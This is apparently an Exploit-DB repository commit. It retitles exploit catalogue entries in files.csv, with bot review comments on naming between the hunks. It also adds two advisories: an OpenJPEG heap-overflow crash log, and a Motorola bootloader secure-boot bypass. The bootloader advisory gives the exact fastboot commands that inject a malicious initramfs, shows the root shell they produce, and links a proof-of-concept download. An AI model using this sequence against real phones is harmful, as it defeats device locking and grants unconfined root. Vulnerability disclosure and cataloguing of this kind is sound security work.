DB: 2017-09-02
2 new exploits

Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service
Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)

OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow
Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass

Git <= 2.7.5 - Command Injection (Metasploit)
Git < 2.7.5 - Command Injection (Metasploit)

Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service
Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service

Joomla! 1.0.9 - (Weblinks) Blind SQL Injection
Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection

Joomla! 1.5.x - (Token) Remote Admin Change Password
Joomla! 1.5.x - 'Token' Remote Admin Change Password

Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion

Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload
Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload

Joomla! 1.6.0-Alpha2 - Cross-Site Scripting
Joomla! 1.6.0 Alpha2 - Cross-Site Scripting

Joomla! - Spam Mail Relay
Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay

Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection
Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection

Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
parent
f94c5966a1
commit
a160bc0c68
4 changed files with 134 additions and 15 deletions
28
files.csv
|
@ -1528,7 +1528,7 @@ id,file,description,date,author,platform,type,port
|
|||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
|
||||
12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0
|
||||
12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0
|
||||
12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0
|
||||
12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
|
||||
12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
|
||||
12508,platforms/osx/dos/12508.html,"Multiple browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0
|
||||
|
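Review bot: the 12492 rename is a title-only change whose convention is not applied to the rest of the hunk: 12493 keeps "Long Unicode Denial of Service (PoC)" and 12508 keeps "'history.go()' Denial of Service" with no parentheses around the impact. If the rule is that the impact class follows the technique in parentheses ("Fork Bomb (Denial of Service)"), state it in the commit message so the neighbouring entries can be brought in line in one pass instead of one entry per commit.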
@ -5664,6 +5664,7 @@ id,file,description,date,author,platform,type,port
|
|||
42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
|
||||
42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
|
||||
42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
|
||||
42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9221,6 +9222,7 @@ id,file,description,date,author,platform,type,port
|
|||
42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
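Review bot: the new 42601 description runs the vulnerability and its impact together with no separator: "Kernel Cmdline Injection Secure Boot and Device Locking Bypass". The file being added titles it "Kernel Cmdline Injection Secure Boot & Device Locking Bypass", and elsewhere this CSV joins compound titles with " / " (for example "Cross-Site Scripting / Remote File Inclusion" on 41927), so "Kernel Cmdline Injection / Secure Boot and Device Locking Bypass" would read consistently and search correctly on either half.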
@ -15783,7 +15785,7 @@ id,file,description,date,author,platform,type,port
|
|||
42558,platforms/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git <= 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
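Review bot: narrowing "<= 2.7.5" to "< 2.7.5" removes 2.7.5 itself from the affected range, and the two titles make opposite claims about that release; the change should be checked against the Metasploit module's own target list before it lands, since a reader triaging a 2.7.5 install will rely on this field. On the same line, the unchanged platform column records "python" for a Ruby Metasploit module (42599.rb) that targets Git clients; "multiple" or "linux" would describe the target rather than the wrapper, which is how the shellcode entries in this hunk use the column (arm, aix, bsd).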
@ -16780,7 +16782,7 @@ id,file,description,date,author,platform,type,port
|
|||
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
|
||||
1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
|
||||
1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
|
||||
1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
|
||||
1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
|
||||
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
|
||||
1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0
|
||||
1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0
|
||||
|
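Review bot: the quoting change on 1698 ("(feed)" to "'feed'") is applied to one entry only; 1697 ("(login/language)") and 1701 ("(surveyid)") in the same hunk keep the parenthesised form this commit is retiring, and 1694 uses a third form, "'page' Parameter". If 'feed' is a request parameter like 'page' on 1694, 1698 should read "'feed' Parameter" too; otherwise convert 1697 and 1701 alongside it so the hunk leaves one convention behind.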
@ -16935,7 +16937,7 @@ id,file,description,date,author,platform,type,port
|
|||
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0
|
||||
1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
|
||||
1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps,0
|
||||
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0
|
||||
1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
|
||||
1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0
|
||||
|
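Review bot: 1922 is converted from "(Weblinks)" to "'Weblinks'", but the adjacent 1920, "Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)", is the same exploit family by the same author and keeps the old form. Convert both in one change so the two entries sort and search alike.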
@ -19943,7 +19945,7 @@ id,file,description,date,author,platform,type,port
|
|||
6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - upload/change Password",2008-08-11,Stack,php,webapps,0
|
||||
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0
|
||||
6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0
|
||||
6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0
|
||||
6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0
|
||||
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Parameter Remote File Disclosure",2008-08-13,JIKO,php,webapps,0
|
||||
6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Parameter Local File Inclusion",2008-08-15,Don,php,webapps,0
|
||||
6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection",2008-08-15,"Hussin X",php,webapps,0
|
||||
|
@ -23288,7 +23290,7 @@ id,file,description,date,author,platform,type,port
|
|||
11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0
|
||||
11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0
|
||||
11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0
|
||||
11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
|
||||
11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
|
||||
11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0
|
||||
11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0
|
||||
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0
|
||||
|
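Review bot: 11814 gains quotes around "JE Tooltip", but the neighbouring 11815 ("com_giftexchange 1.0 Beta - (pkg) SQL Injection") and 11816 ("(id_auk) auktion.php Blind SQL Injection") keep the parenthesised-parameter form the commit replaces elsewhere in files.csv; normalising them here would avoid another title-only commit touching the same hunk.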
@ -23708,13 +23710,13 @@ id,file,description,date,author,platform,type,port
|
|||
12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,php,webapps,0
|
||||
12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,cr4wl3r,php,webapps,0
|
||||
12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
|
||||
12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0
|
||||
12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0
|
||||
12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-05-02,cr4wl3r,php,webapps,0
|
||||
12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,php,webapps,0
|
||||
12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0
|
||||
12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0
|
||||
14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0
|
||||
12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps,0
|
||||
|
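Review bot: 12479 and 12489 get the "Joomla! Component" prefix and the "1.6.0 Alpha2" version form, which is fine, but the context line 12486 "Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions" states the same thing twice and uses the parenthesised form being retired; "Local / Remote File Inclusion" would say it once and match the convention this hunk adopts.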
@ -25006,7 +25008,7 @@ id,file,description,date,author,platform,type,port
|
|||
15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
|
||||
15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps,0
|
||||
15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps,0
|
||||
15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
|
||||
15979,platforms/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
|
||||
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
|
||||
16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
|
||||
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
|
||||
|
@ -38137,7 +38139,7 @@ id,file,description,date,author,platform,type,port
|
|||
41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0
|
||||
41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0
|
||||
41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
|
||||
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
||||
41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
||||
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
|
||||
41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
|
||||
41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
|
||||
|
@ -38379,6 +38381,6 @@ id,file,description,date,author,platform,type,port
|
|||
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
|
||||
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
|
||||
42596,platforms/php/webapps/42596.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42597,platforms/php/webapps/42597.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
|
|
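Review bot: the three Huge-IT titles label the same thing as both a "Component" and a "Plugin" ("Joomla! Component Huge-IT Portfolio Gallery Plugin"); pick one, following the catalogue's other entries (42590 "Joomla! Component Joomanager 2.0.0" uses "Component" alone). The three lines are also inconsistent with each other: 42596 (Video Gallery) carries no "Plugin" suffix while 42597 and 42598 do.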
31
platforms/android/local/42601.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
Sources:
|
||||
https://alephsecurity.com/2017/08/30/untethered-initroot/
|
||||
https://github.com/alephsecurity/initroot
|
||||
|
||||
initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
|
||||
|
||||
By Roee Hay / Aleph Research, HCL Technologies
|
||||
|
||||
Recap of the Vulnerability and the Tethered-jailbreak
|
||||
|
||||
1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
|
||||
2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
|
||||
3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
|
||||
4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
|
||||
5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
|
||||
For example, here is a successful run of the exploit on cedric (Moto G5)
|
||||
|
||||
$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"
|
||||
$ fastboot flash aleph initroot-cedric.cpio.gz
|
||||
$ fastboot continue
|
||||
|
||||
$ adb shell
|
||||
cedric:/ # id
|
||||
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
|
||||
cedric:/ # getenforce
|
||||
Permissive
|
||||
cedric:/ #
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip
|
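Review bot: step 3 of the recap says "named SCRATCH_ADDR (see here for a list of devices)", a link-text remnant from the blog post; in a plain-text advisory "here" points nowhere. Replace it with the URL of the device list, or say it is kept in the linked repository (https://github.com/alephsecurity/initroot), so the per-device address that the cedric example uses (0xA2100000) can be looked up from this file alone.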
86
platforms/linux/dos/42600.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
DESCRIPTION
|
||||
|
||||
An Out-of-Bounds Write issue can be occurred in function opj_mqc_byteout of mqc.c during executing opj_compress. This issue was caused by a malformed BMP file.
|
||||
|
||||
CREDIT
|
||||
|
||||
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
|
||||
|
||||
TESTED VERSION
|
||||
|
||||
Master version of OpenJPEG (805972f, 2016/09/12)
|
||||
|
||||
EXCEPTION LOG
|
||||
|
||||
==119535==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eeb5
|
||||
at pc 0x7f1b2f0154c2 bp 0x7ffec8559cc0 sp 0x7ffec8559cb8
|
||||
WRITE of size 1 at 0x60200000eeb5 thread T0
|
||||
#0 0x7f1b2f0154c1 in opj_mqc_byteout openjpeg-master/src/lib/openjp2/mqc.c:221:13
|
||||
#1 0x7f1b2f014bec in opj_mqc_flush openjpeg-master/src/lib/openjp2/mqc.c:421:2
|
||||
#2 0x7f1b2f042190 in opj_t1_encode_cblk openjpeg-master/src/lib/openjp2/t1.c:1685:3
|
||||
#3 0x7f1b2f040929 in opj_t1_encode_cblks openjpeg-master/src/lib/openjp2/t1.c:1539:7
|
||||
#4 0x7f1b2f06950d in opj_tcd_t1_encode openjpeg-master/src/lib/openjp2/tcd.c:2052:15
|
||||
#5 0x7f1b2f067b66 in opj_tcd_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1240:23
|
||||
#6 0x7f1b2efecc4f in opj_j2k_write_sod openjpeg-master/src/lib/openjp2/j2k.c:4358:15
|
||||
#7 0x7f1b2efea900 in opj_j2k_write_first_tile_part openjpeg-master/src/lib/openjp2/j2k.c:10659:15
|
||||
#8 0x7f1b2efc6d65 in opj_j2k_post_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10448:15
|
||||
#9 0x7f1b2efc52c7 in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10199:23
|
||||
#10 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9
|
||||
#11 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11
|
||||
#12 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36
|
||||
#13 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
#14 0x41a898 in _start (openjpeg-master/bin/opj_compress+0x41a898)
|
||||
|
||||
0x60200000eeb5 is located 0 bytes to the right of 5-byte region [0x60200000eeb0,0x60200000eeb5)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4ba9c8 in malloc (openjpeg-master/bin/opj_compress+0x4ba9c8)
|
||||
#1 0x7f1b2f07369c in opj_malloc openjpeg-master/src/lib/openjp2/opj_malloc.c:195:10
|
||||
#2 0x7f1b2f06ed5f in opj_tcd_code_block_enc_allocate_data openjpeg-master/src/lib/openjp2/tcd.c:1097:36
|
||||
#3 0x7f1b2f0664b0 in opj_tcd_init_tile openjpeg-master/src/lib/openjp2/tcd.c:1023:14
|
||||
#4 0x7f1b2f0604e6 in opj_tcd_init_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1055:9
|
||||
#5 0x7f1b2efc57d3 in opj_j2k_pre_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10300:15
|
||||
#6 0x7f1b2efc4d8d in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10146:23
|
||||
#7 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9
|
||||
#8 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11
|
||||
#9 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36
|
||||
#10 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg-master/src/lib/openjp2/mqc.c:221:13 in opj_mqc_byteout
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa
|
||||
0x0c047fff9da0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
0x0c047fff9db0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
0x0c047fff9dc0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
=>0x0c047fff9dd0: fa fa 00 01 fa fa[05]fa fa fa 00 01 fa fa 00 fa
|
||||
0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 04 fa
|
||||
0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
|
||||
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
